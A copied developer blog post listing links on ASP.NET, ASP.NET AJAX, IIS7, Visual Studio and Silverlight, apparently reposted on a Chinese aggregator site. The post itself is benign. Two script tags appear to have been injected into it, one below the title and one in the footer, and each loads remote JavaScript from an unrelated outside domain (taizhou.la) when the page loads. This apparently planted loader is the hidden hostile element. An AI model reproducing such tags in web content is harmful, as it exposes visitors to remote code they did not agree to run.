September 16th Links: ASP.NET, ASP.NET AJAX, IIS7, Visual Studio, Silverlight

<script language='javascript' src='http://www.taizhou.la/AD/ad.js'></script>

Here is the latest in my link-listing series.  Also check out my ASP.NET Tips, Tricks and Tutorials page for links to popular articles I've done myself in the past.

ASP.NET

  • Debugging Script: Dumping out Current and Recent ASP.NET Requests: Tess Ferrandez from the ASP.NET support team has an excellent post that details how to use the windbg debugger to dump out real-time information about what requests ASP.NET is currently processing on the server (super useful when investigating failures).  She has a great script you can just run "as-is" in this article, as well as an in-depth discussion about how it works.
  • Freezing GridView Column Headers with CSS and a Control Adapter: Matt Berseth has a cool article on how you can use CSS to implement a "frozen columns headers" feature with the standard <asp:gridview> control.  Note that this type of scenario is much easier with the new <asp:listview> control in .NET 3.5, which enables you to customize all of the html markup emitted.

ASP.NET AJAX

  • Update for the iPhone: Matt Gibbs blogs about a fix you can apply to ASP.NET AJAX to address a change in the iPhone 1.01 patch that impacts how regular expressions are parsed in the iPhone Safari browser.  Matt's fix enables you to continue targeting iPhone users with your ASP.NET AJAX applications.

Visual Studio

  • XML to Schema Inference Wizard for Visual Studio 2008: Scott Hanselman has a great blog post about a new item template wizard that makes it really easy to automatically infer an XML schema from a XML file or XML snippet.  He then shows how you can use the cool new LINQ to XML features in VB9 to get automatic LINQ to XML intellisense inside VS 2008 with it.

IIS 7.0

  • Ten Reasons why IIS 7.0 Rocks: The Microsoft.com team has been running the entire www.microsoft.com site on IIS7 and Windows Server 2008 the last few months.  This blog post from them lists their top 10 favorite improvements in IIS7.

Silverlight

  • Ink Recognition and Silverlight: Loren has a really cool sample built with Silverlight that demonstrates how you can use the ink pen recognition support within Silverlight to enable tablet or mouse based Google searches using a Silverlight application.  A very cool mashup.
  • Silverlight Spy Tool: Silverlight Spy is a small WinForms application capable of inspecting Silverlight 1.0 applications.  You can use it to navigate a XAML object explorer of a running Silverlight application, trace out messages from it, and enable easier debugging of it.
  • HtmlTextBlock control for Silverlight: David Anson has published a really cool control for Silverlight 1.1 that provides an easy way to take HTML input and display it using the text/graphics stack within Silverlight.
  • Silverlight Dev Camp Chicago: Kevin Marshall is organizing an upcoming Silverlight DevCamp event in Chicago on September 28th-29th.  You can attend completely for free.

Hope this helps,

Scott

aggbug.aspx?PostID=3900908 <script language='javascript' src='http://www.taizhou.la/AD/as.js'></script>
發佈了97 篇原創文章 · 獲贊 0 · 訪問量 6萬+
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章